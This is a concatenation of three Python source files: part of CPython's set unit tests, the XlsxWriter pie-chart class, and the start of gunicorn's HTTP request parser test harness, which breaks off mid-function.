self.dup = set(self.values)
self.length = 3
def test_repr(self):
self.check_repr_against_values()
#------------------------------------------------------------------------------
class TestBasicOpsMixedStringBytes(TestBasicOps, unittest.TestCase):
def setUp(self):
self._warning_filters = warnings_helper.check_warnings()
self._warning_filters.__enter__()
warnings.simplefilter('ignore', BytesWarning)
self.case = "string and bytes set"
self.values = ["a", "b", b"a", b"b"]
self.set = set(self.values)
self.dup = set(self.values)
self.length = 4
def tearDown(self):
self._warning_filters.__exit__(None, None, None)
def test_repr(self):
self.check_repr_against_values()
#==============================================================================
def baditer():
raise TypeError
yield True
def gooditer():
yield True
class TestExceptionPropagation(unittest.TestCase):
"""SF 628246: Set constructor should not trap iterator TypeErrors"""
def test_instanceWithException(self):
self.assertRaises(TypeError, set, baditer())
def test_instancesWithoutException(self):
# All of these iterables should load without exception.
set([1,2,3])
set((1,2,3))
set({'one':1, 'two':2, 'three':3})
set(range(3))
set('abc')
set(gooditer())
def test_changingSizeWhileIterating(self):
s = set([1,2,3])
try:
for i in s:
s.update([4])
except RuntimeError:
pass
else:
self.fail("no exception when changing size during iteration")
#==============================================================================
class TestSetOfSets(unittest.TestCase):
def test_constructor(self):
inner = frozenset([1])
outer = set([inner])
element = outer.pop()
self.assertEqual(type(element), frozenset)
outer.add(inner) # Rebuild set of sets with .add method
outer.remove(inner)
self.assertEqual(outer, set()) # Verify that remove worked
outer.discard(inner) # Absence of KeyError indicates working fine
#==============================================================================
class TestBinaryOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_eq(self): # SF bug 643115
self.assertEqual(self.set, set({2:1,4:3,6:5}))
def test_union_subset(self):
result = self.set | set([2])
self.assertEqual(result, set((2, 4, 6)))
def test_union_superset(self):
result = self.set | set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_union_overlap(self):
result = self.set | set([3, 4, 5])
self.assertEqual(result, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
result = self.set | set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
def test_intersection_subset(self):
result = self.set & set((2, 4))
self.assertEqual(result, set((2, 4)))
def test_intersection_superset(self):
result = self.set & set([2, 4, 6, 8])
self.assertEqual(result, set([2, 4, 6]))
def test_intersection_overlap(self):
result = self.set & set([3, 4, 5])
self.assertEqual(result, set([4]))
def test_intersection_non_overlap(self):
result = self.set & set([8])
self.assertEqual(result, empty_set)
def test_isdisjoint_subset(self):
result = self.set.isdisjoint(set((2, 4)))
self.assertEqual(result, False)
def test_isdisjoint_superset(self):
result = self.set.isdisjoint(set([2, 4, 6, 8]))
self.assertEqual(result, False)
def test_isdisjoint_overlap(self):
result = self.set.isdisjoint(set([3, 4, 5]))
self.assertEqual(result, False)
def test_isdisjoint_non_overlap(self):
result = self.set.isdisjoint(set([8]))
self.assertEqual(result, True)
def test_sym_difference_subset(self):
result = self.set ^ set((2, 4))
self.assertEqual(result, set([6]))
def test_sym_difference_superset(self):
result = self.set ^ set((2, 4, 6, 8))
self.assertEqual(result, set([8]))
def test_sym_difference_overlap(self):
result = self.set ^ set((3, 4, 5))
self.assertEqual(result, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
result = self.set ^ set([8])
self.assertEqual(result, set([2, 4, 6, 8]))
#==============================================================================
class TestUpdateOps(unittest.TestCase):
def setUp(self):
self.set = set((2, 4, 6))
def test_union_subset(self):
self.set |= set([2])
self.assertEqual(self.set, set((2, 4, 6)))
def test_union_superset(self):
self.set |= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_overlap(self):
self.set |= set([3, 4, 5])
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_union_non_overlap(self):
self.set |= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_union_method_call(self):
self.set.update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 4, 5, 6]))
def test_intersection_subset(self):
self.set &= set((2, 4))
self.assertEqual(self.set, set((2, 4)))
def test_intersection_superset(self):
self.set &= set([2, 4, 6, 8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_intersection_overlap(self):
self.set &= set([3, 4, 5])
self.assertEqual(self.set, set([4]))
def test_intersection_non_overlap(self):
self.set &= set([8])
self.assertEqual(self.set, empty_set)
def test_intersection_method_call(self):
self.set.intersection_update(set([3, 4, 5]))
self.assertEqual(self.set, set([4]))
def test_sym_difference_subset(self):
self.set ^= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_sym_difference_superset(self):
self.set ^= set((2, 4, 6, 8))
self.assertEqual(self.set, set([8]))
def test_sym_difference_overlap(self):
self.set ^= set((3, 4, 5))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_sym_difference_non_overlap(self):
self.set ^= set([8])
self.assertEqual(self.set, set([2, 4, 6, 8]))
def test_sym_difference_method_call(self):
self.set.symmetric_difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 3, 5, 6]))
def test_difference_subset(self):
self.set -= set((2, 4))
self.assertEqual(self.set, set([6]))
def test_difference_superset(self):
self.set -= set((2, 4, 6, 8))
self.assertEqual(self.set, set([]))
def test_difference_overlap(self):
self.set -= set((3, 4, 5))
self.assertEqual(self.set, set([2, 6]))
def test_difference_non_overlap(self):
self.set -= set([8])
self.assertEqual(self.set, set([2, 4, 6]))
def test_difference_method_call(self):
self.set.difference_update(set([3, 4, 5]))
self.assertEqual(self.set, set([2, 6]))
#==============================================================================
class TestMutate(unittest.TestCase):
def setUp(self):
self.values = ["a", "b", "c"]
self.set = set(self.values)
def test_add_present(self):
self.set.add("c")
self.assertEqual(self.set, set("abc"))
def test_add_absent(self):
self.set.add("d")
self.assertEqual(self.set, set("abcd"))
def test_add_until_full(self):
tmp = set()
expected_len = 0
for v in self.values:
tmp.add(v)
expected_len += 1
self.assertEqual(len(tmp), expected_len)
self.assertEqual(tmp, self.set)
def test_remove_present(self):
self.set.remove("b")
self.assertEqual(self.set, set("ac"))
def test_remove_absent(self):
try:
self.set.remove("d")
self.fail("Removing missing element should have raised LookupError")
except LookupError:
pass
def test_remove_until_empty(self):
expected_len = len(self.set)
for v in self.values:
self.set.remove(v)
expected_len -= 1
self.assertEqual(len(self.set), expected_len)
def test_discard_present(self):
self.set.discard("c")
self.assertEqual(self.set, set("ab"))
def test_discard_absent(self):
self.set.discard("d")
self.assertEqual(self.set, set("abc"))
def test_clear(self):
self.set.clear()
self.assertEqual(len(self.set), 0)
def test_pop(self):
popped = {}
while self.set:
popped[self.set.pop()] = None
self.assertEqual(len(popped), len(self.values))
for v in self.values:
self.assertIn(v, popped)
def test_update_empty_tuple(self):
self.set.update(())
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_overlap(self):
self.set.update(("a",))
self.assertEqual(self.set, set(self.values))
def test_update_unit_tuple_non_overlap(self):
self.set.update(("a", "z"))
self.assertEqual(self.set, set(self.values + ["z"]))
#==============================================================================
class TestSubsets:
case2method = {"<=": "issubset",
">=": "issuperset",
}
reverse = {"==": "==",
"!=": "!=",
"<": ">",
">": "<",
"<=": ">=",
">=": "<=",
}
def test_issubset(self):
x = self.left
y = self.right
for case in "!=", "==", "<", "<=", ">", ">=":
expected = case in self.cases
# Test the binary infix spelling.
result = eval("x" + case + "y", locals())
self.assertEqual(result, expected)
# Test the "friendly" method-name spelling, if one exists.
if case in TestSubsets.case2method:
method = getattr(x, TestSubsets.case2method[case])
result = method(y)
self.assertEqual(result, expected)
# Now do the same for the operands reversed.
rcase = TestSubsets.reverse[case]
result = eval("y" + rcase + "x", locals())
self.assertEqual(result, expected)
if rcase in TestSubsets.case2method:
method = getattr(y, TestSubsets.case2method[rcase])
result = method(x)
self.assertEqual(result, expected)
#------------------------------------------------------------------------------
class TestSubsetEqualEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set()
name = "both empty"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEqualNonEmpty(TestSubsets, unittest.TestCase):
left = set([1, 2])
right = set([1, 2])
name = "equal pair"
cases = "==", "<=", ">="
#------------------------------------------------------------------------------
class TestSubsetEmptyNonEmpty(TestSubsets, unittest.TestCase):
left = set()
right = set([1, 2])
name = "one empty, one non-empty"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetPartial(TestSubsets, unittest.TestCase):
left = set([1])
right = set([1, 2])
name = "one a non-empty proper subset of other"
cases = "!=", "<", "<="
#------------------------------------------------------------------------------
class TestSubsetNonOverlap(TestSubsets, unittest.TestCase):
left = set([1])
right = set([2])
name = "neither empty, neither contains"
cases = "!="
#==============================================================================
class TestOnlySetsInBinaryOps:
def test_eq_ne(self):
# Unlike the others, this is testing that == and != *are* allowed.
self.assertEqual(self.other == self.set, False)
self.assertEqual(self.set == self.other, False)
self.assertEqual(self.other != self.set, True)
self.assertEqual(self.set != self.other, True)
def test_ge_gt_le_lt(self):
self.assertRaises(TypeError, lambda: self.set < self.other)
self.assertRaises(TypeError, lambda: self.set <= self.other)
self.assertRaises(TypeError, lambda: self.set > self.other)
self.assertRaises(TypeError, lambda: self.set >= self.other)
self.assertRaises(TypeError, lambda: self.other < self.set)
self.assertRaises(TypeError, lambda: self.other <= self.set)
self.assertRaises(TypeError, lambda: self.other > self.set)
self.assertRaises(TypeError, lambda: self.other >= self.set)
def test_update_operator(self):
try:
self.set |= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_update(self):
if self.otherIsIterable:
self.set.update(self.other)
else:
self.assertRaises(TypeError, self.set.update, self.other)
def test_union(self):
self.assertRaises(TypeError, lambda: self.set | self.other)
self.assertRaises(TypeError, lambda: self.other | self.set)
if self.otherIsIterable:
self.set.union(self.other)
else:
self.assertRaises(TypeError, self.set.union, self.other)
def test_intersection_update_operator(self):
try:
self.set &= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_intersection_update(self):
if self.otherIsIterable:
self.set.intersection_update(self.other)
else:
self.assertRaises(TypeError,
self.set.intersection_update,
self.other)
def test_intersection(self):
self.assertRaises(TypeError, lambda: self.set & self.other)
self.assertRaises(TypeError, lambda: self.other & self.set)
if self.otherIsIterable:
self.set.intersection(self.other)
else:
self.assertRaises(TypeError, self.set.intersection, self.other)
def test_sym_difference_update_operator(self):
try:
self.set ^= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_sym_difference_update(self):
if self.otherIsIterable:
self.set.symmetric_difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.symmetric_difference_update,
self.other)
def test_sym_difference(self):
self.assertRaises(TypeError, lambda: self.set ^ self.other)
self.assertRaises(TypeError, lambda: self.other ^ self.set)
if self.otherIsIterable:
self.set.symmetric_difference(self.other)
else:
self.assertRaises(TypeError, self.set.symmetric_difference, self.other)
def test_difference_update_operator(self):
try:
self.set -= self.other
except TypeError:
pass
else:
self.fail("expected TypeError")
def test_difference_update(self):
if self.otherIsIterable:
self.set.difference_update(self.other)
else:
self.assertRaises(TypeError,
self.set.difference_update,
self.other)
def test_difference(self):
self.assertRaises(TypeError, lambda: self.set - self.other)
self.assertRaises(TypeError, lambda: self.other - self.set)
if self.otherIsIterable:
self.set.difference(self.other)
else:
self.assertRaises(TypeError, self.set.difference, self.other)
#------------------------------------------------------------------------------
class TestOnlySetsNumeric(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 19
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsDict(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = {1:2, 3:4}
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsOperator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = operator.add
self.otherIsIterable = False
#------------------------------------------------------------------------------
class TestOnlySetsTuple(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = (2, 4, 6)
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsString(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
self.set = set((1, 2, 3))
self.other = 'abc'
self.otherIsIterable = True
#------------------------------------------------------------------------------
class TestOnlySetsGenerator(TestOnlySetsInBinaryOps, unittest.TestCase):
def setUp(self):
def gen():
for i in range(0, 10, 2):
yield i
self.set = set((1, 2, 3))
self.other = gen()
self.otherIsIterable = True
#==============================================================================
class TestCopying:
def test_copy(self):
dup = self.set.copy()
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertTrue(dup_list[i] is set_list[i])
def test_deep_copy(self):
dup = copy.deepcopy(self.set)
##print type(dup), repr(dup)
dup_list = sorted(dup, key=repr)
set_list = sorted(self.set, key=repr)
self.assertEqual(len(dup_list), len(set_list))
for i in range(len(dup_list)):
self.assertEqual(dup_list[i], set_list[i])
#------------------------------------------------------------------------------
class TestCopyingEmpty(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set()
#------------------------------------------------------------------------------
class TestCopyingSingleton(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["hello"])
#------------------------------------------------------------------------------
class TestCopyingTriple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set(["zero", 0, None])
#------------------------------------------------------------------------------
class TestCopyingTuple(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([(1, 2)])
#------------------------------------------------------------------------------
class TestCopyingNested(TestCopying, unittest.TestCase):
def setUp(self):
self.set = set([((1, 2), (3, 4))])
#==============================================================================
class TestIdentities(unittest.TestCase):
def setUp(self):
self.a = set('abracadabra')
self.b = set('alacazam')
def test_binopsVsSubsets(self):
a, b = self.a, self.b
self.assertTrue(a - b < a)
self.assertTrue(b - a < b)
self.assertTrue(a & b < a)
self.assertTrue(a & b < b)
self.assertTrue(a | b > a)
self.assertTrue(a | b > b)
self.assertTrue(a ^ b < a | b)
def test_commutativity(self):
a, b = self.a, self.b
self.assertEqual(a&b, b&a)
self.assertEqual(a|b, b|a)
self.assertEqual(a^b, b^a)
if a != b:
self.assertNotEqual(a-b, b-a)
def test_summations(self):
# check that sums of parts equal the whole
a, b = self.a, self.b
self.assertEqual((a-b)|(a&b)|(b-a), a|b)
self.assertEqual((a&b)|(a^b), a|b)
self.assertEqual(a|(b-a), a|b)
self.assertEqual((a-b)|b, a|b)
self.assertEqual((a-b)|(a&b), a)
self.assertEqual((b-a)|(a&b), b)
self.assertEqual((a-b)|(b-a), a^b)
def test_exclusion(self):
# check that inverse operations show non-overlap
a, b, zero = self.a, self.b, set()
self.assertEqual((a-b)&b, zero)
self.assertEqual((b-a)&a, zero)
self.assertEqual((a&b)&(a^b), zero)
# Tests derived from test_itertools.py =======================================
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __next__(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing __next__()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def __next__(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def __next__(self):
raise StopIteration
from itertools import chain
def L(seqn):
'Test multiple tiers of iterators'
return chain(map(lambda x:x, R(Ig(G(seqn)))))
class TestVariousIteratorArgs(unittest.TestCase):
def test_constructor(self):
for cons in (set, frozenset):
for s in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5)):
for g in (G, I, Ig, S, L, R):
self.assertEqual(sorted(cons(g(s)), key=repr), sorted(g(s), key=repr))
self.assertRaises(TypeError, cons , X(s))
self.assertRaises(TypeError, cons , N(s))
self.assertRaises(ZeroDivisionError, cons , E(s))
def test_inline_methods(self):
s = set('november')
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for meth in (s.union, s.intersection, s.difference, s.symmetric_difference, s.isdisjoint):
for g in (G, I, Ig, L, R):
expected = meth(data)
actual = meth(g(data))
if isinstance(expected, bool):
self.assertEqual(actual, expected)
else:
self.assertEqual(sorted(actual, key=repr), sorted(expected, key=repr))
self.assertRaises(TypeError, meth, X(s))
self.assertRaises(TypeError, meth, N(s))
self.assertRaises(ZeroDivisionError, meth, E(s))
def test_inplace_methods(self):
for data in ("123", "", range(1000), ('do', 1.2), range(2000,2200,5), 'december'):
for methname in ('update', 'intersection_update',
'difference_update', 'symmetric_difference_update'):
for g in (G, I, Ig, S, L, R):
s = set('january')
t = s.copy()
getattr(s, methname)(list(g(data)))
getattr(t, methname)(g(data))
self.assertEqual(sorted(s, key=repr), sorted(t, key=repr))
self.assertRaises(TypeError, getattr(set('january'), methname), X(data))
self.assertRaises(TypeError, getattr(set('january'), methname), N(data))
self.assertRaises(ZeroDivisionError, getattr(set('january'), methname), E(data))
class bad_eq:
def __eq__(self, other):
if be_bad:
set2.clear()
raise ZeroDivisionError
return self is other
def __hash__(self):
return 0
class bad_dict_clear:
def __eq__(self, other):
if be_bad:
dict2.clear()
return self is other
def __hash__(self):
return 0
class TestWeirdBugs(unittest.TestCase):
def test_8420_set_merge(self):
# This used to segfault
global be_bad, set2, dict2
be_bad = False
set1 = {bad_eq()}
set2 = {bad_eq() for i in range(75)}
be_bad = True
self.assertRaises(ZeroDivisionError, set1.update, set2)
be_bad = False
set1 = {bad_dict_clear()}
dict2 = {bad_dict_clear(): None}
be_bad = True
set1.symmetric_difference_update(dict2)
def test_iter_and_mutate(self):
# Issue #24581
s = set(range(100))
s.clear()
s.update(range(100))
si = iter(s)
s.clear()
a = list(range(100))
s.update(range(100))
list(si)
def test_merge_and_mutate(self):
class X:
def __hash__(self):
return hash(0)
def __eq__(self, o):
other.clear()
return False
other = set()
other = {X() for i in range(10)}
s = {0}
s.update(other)
# Application tests (based on David Eppstein's graph recipes ====================================
def powerset(U):
"""Generates all subsets of a set or sequence U."""
U = iter(U)
try:
x = frozenset([next(U)])
for S in powerset(U):
yield S
yield S | x
except StopIteration:
yield frozenset()
def cube(n):
"""Graph of n-dimensional hypercube."""
singletons = [frozenset([x]) for x in range(n)]
return dict([(x, frozenset([x^s for s in singletons]))
for x in powerset(range(n))])
def linegraph(G):
"""Graph, the vertices of which are edges of G,
with two vertices being adjacent iff the corresponding
edges share a vertex."""
L = {}
for x in G:
for y in G[x]:
nx = [frozenset([x,z]) for z in G[x] if z != y]
ny = [frozenset([y,z]) for z in G[y] if z != x]
L[frozenset([x,y])] = frozenset(nx+ny)
return L
def faces(G):
'Return a set of faces in G. Where a face is a set of vertices on that face'
# currently limited to triangles,squares, and pentagons
f = set()
for v1, edges in G.items():
for v2 in edges:
for v3 in G[v2]:
if v1 == v3:
continue
if v1 in G[v3]:
f.add(frozenset([v1, v2, v3]))
else:
for v4 in G[v3]:
if v4 == v2:
continue
if v1 in G[v4]:
f.add(frozenset([v1, v2, v3, v4]))
else:
for v5 in G[v4]:
if v5 == v3 or v5 == v2:
continue
if v1 in G[v5]:
f.add(frozenset([v1, v2, v3, v4, v5]))
return f
class TestGraphs(unittest.TestCase):
def test_cube(self):
g = cube(3) # vert --> {v1, v2, v3}
vertices1 = set(g)
self.assertEqual(len(vertices1), 8) # eight vertices
for edge in g.values():
self.assertEqual(len(edge), 3) # each vertex connects to three edges
vertices2 = set(v for edges in g.values() for v in edges)
self.assertEqual(vertices1, vertices2) # edge vertices in original set
cubefaces = faces(g)
self.assertEqual(len(cubefaces), 6) # six faces
for face in cubefaces:
self.assertEqual(len(face), 4) # each face is a square
def test_cuboctahedron(self):
# http://en.wikipedia.org/wiki/Cuboctahedron
# 8 triangular faces and 6 square faces
# 12 identical vertices each connecting a triangle and square
g = cube(3)
cuboctahedron = linegraph(g) # V( --> {V1, V2, V3, V4}
self.assertEqual(len(cuboctahedron), 12)# twelve vertices
vertices = set(cuboctahedron)
for edges in cuboctahedron.values():
self.assertEqual(len(edges), 4) # each vertex connects to four other vertices
othervertices = set(edge for edges in cuboctahedron.values() for edge in edges)
self.assertEqual(vertices, othervertices) # edge vertices in original set
cubofaces = faces(cuboctahedron)
facesizes = collections.defaultdict(int)
for face in cubofaces:
facesizes[len(face)] += 1
self.assertEqual(facesizes[3], 8) # eight triangular faces
self.assertEqual(facesizes[4], 6) # six square faces
for vertex in cuboctahedron:
edge = vertex # Cuboctahedron vertices are edges in Cube
self.assertEqual(len(edge), 2) # Two cube vertices define an edge
for cubevert in edge:
self.assertIn(cubevert, g)
#==============================================================================
if __name__ == "__main__":
unittest.main()
|
|
###############################################################################
#
# ChartPie - A class for writing the Excel XLSX Pie charts.
#
# Copyright 2013-2017, John McNamara, jmcnamara@cpan.org
#
from warnings import warn
from . import chart
class ChartPie(chart.Chart):
"""
A class for writing the Excel XLSX Pie charts.
"""
###########################################################################
#
# Public API.
#
###########################################################################
def __init__(self, options=None):
"""
Constructor.
"""
super(ChartPie, self).__init__()
if options is None:
options = {}
self.vary_data_color = 1
self.rotation = 0
# Set the available data label positions for this chart type.
self.label_position_default = 'best_fit'
self.label_positions = {
'center': 'ctr',
'inside_end': 'inEnd',
'outside_end': 'outEnd',
'best_fit': 'bestFit'}
def set_rotation(self, rotation):
"""
Set the Pie/Doughnut chart rotation: the angle of the first slice.
Args:
rotation: First segment angle: 0 <= rotation <= 360.
Returns:
Nothing.
"""
if rotation is None:
return
# Ensure the rotation is in Excel's range.
if rotation < 0 or rotation > 360:
warn("Chart rotation %d outside Excel range: 0 <= rotation <= 360"
% rotation)
return
self.rotation = int(rotation)
###########################################################################
#
# Private API.
#
###########################################################################
def _write_chart_type(self, args):
# Override the virtual superclass method with a chart specific method.
# Write the c:pieChart element.
self._write_pie_chart(args)
###########################################################################
#
# XML methods.
#
###########################################################################
def _write_pie_chart(self, args):
# Write the <c:pieChart> element. Over-ridden method to remove
# axis_id code since Pie charts don't require val and cat axes.
self._xml_start_tag('c:pieChart')
# Write the c:varyColors element.
self._write_vary_colors()
# Write the series elements.
for data in self.series:
self._write_ser(data)
# Write the c:firstSliceAng element.
self._write_first_slice_ang()
self._xml_end_tag('c:pieChart')
def _write_plot_area(self):
# Over-ridden method to remove the cat_axis() and val_axis() code
# since Pie charts don't require those axes.
#
# Write the <c:plotArea> element.
self._xml_start_tag('c:plotArea')
# Write the c:layout element.
self._write_layout(self.plotarea.get('layout'), 'plot')
# Write the subclass chart type element.
self._write_chart_type(None)
self._xml_end_tag('c:plotArea')
def _write_legend(self):
# Over-ridden method to add <c:txPr> to legend.
# Write the <c:legend> element.
position = self.legend_position
font = self.legend_font
delete_series = []
overlay = 0
if (self.legend_delete_series is not None
and type(self.legend_delete_series) is list):
delete_series = self.legend_delete_series
if position.startswith('overlay_'):
position = position.replace('overlay_', '')
overlay = 1
allowed = {
'right': 'r',
'left': 'l',
'top': 't',
'bottom': 'b',
}
if position == 'none':
return
if position not in allowed:
return
position = allowed[position]
self._xml_start_tag('c:legend')
# Write the c:legendPos element.
self._write_legend_pos(position)
# Remove series labels from the legend.
for index in delete_series:
# Write the c:legendEntry element.
self._write_legend_entry(index)
# Write the c:layout element.
self._write_layout(self.legend_layout, 'legend')
# Write the c:overlay element.
if overlay:
self._write_overlay()
# Write the c:txPr element. Over-ridden.
self._write_tx_pr_legend(None, font)
self._xml_end_tag('c:legend')
def _write_tx_pr_legend(self, horiz, font):
# Write the <c:txPr> element for legends.
if font and font.get('rotation'):
rotation = font['rotation']
else:
rotation = None
self._xml_start_tag('c:txPr')
# Write the a:bodyPr element.
self._write_a_body_pr(rotation, horiz)
# Write the a:lstStyle element.
self._write_a_lst_style()
# Write the a:p element.
self._write_a_p_legend(font)
self._xml_end_tag('c:txPr')
def _write_a_p_legend(self, font):
# Write the <a:p> element for legends.
self._xml_start_tag('a:p')
# Write the a:pPr element.
self._write_a_p_pr_legend(font)
# Write the a:endParaRPr element.
self._write_a_end_para_rpr()
self._xml_end_tag('a:p')
def _write_a_p_pr_legend(self, font):
# Write the <a:pPr> element for legends.
attributes = [('rtl', 0)]
self._xml_start_tag('a:pPr', attributes)
# Write the a:defRPr element.
self._write_a_def_rpr(font)
self._xml_end_tag('a:pPr')
def _write_vary_colors(self):
# Write the <c:varyColors> element.
attributes = [('val', 1)]
self._xml_empty_tag('c:varyColors', attributes)
def _write_first_slice_ang(self):
# Write the <c:firstSliceAng> element.
attributes = [('val', self.rotation)]
self._xml_empty_tag('c:firstSliceAng', attributes)
|
|
# Copyright 2009 Paul J. Davis <paul.joseph.davis@gmail.com>
#
# This file is part of the pywebmachine package released
# under the MIT license.
import inspect
import os
import random
from gunicorn._compat import execfile_
from gunicorn.config import Config
from gunicorn.http.parser import RequestParser
from gunicorn.util import split_request_uri
from gunicorn import six
dirname = os.path.dirname(__file__)
random.seed()
def uri(data):
ret = {"raw": data}
parts = split_request_uri(data)
ret["scheme"] = parts.scheme or ''
ret["host"] = parts.netloc.rsplit(":", 1)[0] or None
ret["port"] = parts.port or 80
ret["path"] = parts.path or ''
ret["query"] = parts.query or ''
ret["fragment"] = parts.fragment or ''
return ret
def load_py(fname):
config = globals().copy()
config["uri"] = uri
config["cfg"] = Config()
execfile_(fname, config)
return config
class request(object):
def __init__(self, fname, expect):
self.fname = fname
self.name = os.path.basename(fname)
self.expect = expect
if not isinstance(self.expect, list):
self.expect = [self.expect]
with open(self.fname, 'rb') as handle:
self.data = handle.read()
self.data = self.data.replace(b"\n", b"").replace(b"\\r\\n", b"\r\n")
self.data = self.data.replace(b"\\0", b"\000")
# Functions for sending data to the parser.
# These functions mock out reading from a
# socket or other data source that might
# be used in real life.
def send_all(self):
yield self.data
def send_lines(self):
lines = self.data
pos = lines.find(b"\r\n")
while pos > 0:
yield lines[:pos+2]
lines = lines[pos+2:]
pos = lines.find(b"\r\n")
if lines:
yield lines
def send_bytes(self):
for d in self.data:
if six.PY3:
yield bytes([d])
else:
yield d
def send_random(self):
maxs = round(len(self.data) / 10)
read = 0
while read < len(self.data):
chunk = random.randint(1, maxs)
yield self.data[read:read+chunk]
read += chunk
def send_special_chunks(self):
"""Meant to test the request line length check.
Sends the request data in two chunks, one having a
length of 1 byte, which ensures that no CRLF is included,
and a second chunk containing the rest of the request data.
If the request line length check is not done properly,
testing the ``tests/requests/valid/099.http`` request
fails with a ``LimitRequestLine`` exception.
"""
chunk = self.data[:1]
read = 0
while read < len(self.data):
yield self.data[read:read+len(chunk)]
read += len(chunk)
chunk = self.data[read:]
# These functions define the sizes that the
# read functions will read with.
def size_all(self):
return -1
def size_bytes(self):
return 1
def size_small_random(self):
return random.randint(1, 4)
def size_random(self):
return random.randint(1, 4096)
# Match a body against various ways of reading
# a message. Pass in the request, expected body
# and one of the size functions.
def szread(self, func, sizes):
sz = sizes()
data = func(sz)
if sz >= 0 and len(data) > sz:
raise AssertionError("Read more than %d bytes: %s" % (sz, data))
return data
def match_read(self, req, body, sizes):
data = self.szread(req.body.read, sizes)
count = 1000
while body:
if body[:len(data)] != data:
raise AssertionError("Invalid body data read: %r != %r" % (
data, body[:len(data)]))
body = body[len(data):]
data = self.szread(req.body.read, sizes)
if not data:
count -= 1
if count <= 0:
raise AssertionError("Unexpected apparent EOF")
if body:
raise AssertionError("Failed to read entire body: %r" % body)
elif data:
raise AssertionError("Read beyond expected body: %r" % data)
data = req.body.read(sizes())
if data:
raise AssertionError("Read after body finished: %r" % data)
def match_readline(self, req, body, sizes):
data = self.szread(req.body.readline, sizes)
count = 1000
while body:
if body[:len(data)] != data:
raise AssertionError("Invalid data read: %r" % data)
if b'\n' in data[:-1]:
raise AssertionError("Embedded new line: %r" % data)
body = body[len(data):]
data = self.szread(req.body.readline, sizes)
if not data:
count -= 1
if count <= 0:
raise AssertionError("Apparent unexpected EOF")
if body:
raise AssertionError("Failed to read entire body: %r" % body)
elif data:
raise AssertionError("Read beyond expected body: %r" % data)
data = req.body.readline(sizes())
if data:
raise AssertionError("Read data after body finished: %r" % data)
def match_readlines(self, req, body, sizes):
"""\
This skips the sizes checks as we don't implement it.
"""
data = req.body.readlines()
for line in data:
if b'\n' in line[:-1]:
raise AssertionError("Embedded new line: %r" % line)
if line != body[:len(line)]:
raise AssertionError("Invalid body data read: %r != %r" % (
line, body[:len(line)]))
body = body[len(line):]
if body:
raise AssertionError("Failed to read entire body: %r" % body)
data = req.body.readlines(sizes())
if data:
raise AssertionError("Read data after body finished: %r" % data)
def match_iter(self, req, body, sizes):
"""\
This skips sizes because there's its not part of the iter api.
"""
for line in req.body:
if b'\n' in line[:-1]:
raise AssertionError("Embedded new line: %r" % line)
if line != body[:len(line)]:
raise AssertionError("Invalid body data read: %r != %r" % (
line, body[:len(line)]))
body = body[len(line):]
if body:
raise AssertionError("Failed to read entire body: %r" % body)
try:
data = six.next(iter(req.body))
raise AssertionError("Read data after body finished: %r" % data)
except StopIteration:
pass
# Construct a series of test cases from the permutations of
# send, size, and match functions.
def gen_cases(self, cfg):
def get_funs(p):
return [v for k, v in inspect.getmembers(self) if k.startswith(p)]
senders = get_funs("send_")
sizers = get_funs("size_")
